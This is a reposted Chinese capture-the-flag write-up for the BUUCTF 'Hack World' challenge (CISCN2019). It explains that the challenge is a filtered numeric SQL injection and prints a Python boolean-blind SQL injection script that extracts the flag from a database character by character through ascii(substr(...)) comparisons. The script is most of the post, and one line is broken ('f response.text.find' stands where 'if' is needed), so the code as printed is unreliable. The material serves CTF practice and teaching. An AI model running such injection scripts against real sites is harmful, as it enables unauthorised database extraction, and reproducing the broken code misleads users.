欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 文化 > BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

2024/11/30 10:49:55 来源:https://blog.csdn.net/m0_74167420/article/details/139901150  浏览:    关键词:BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
        for j in range(32, 128):
                payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
                response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})
# {m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。
                f response.text.find('girl') == -1:
                        result += chr(j)
                        print(j)
                        break
        print("正在输出flag:", result)
print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。
#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。
#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com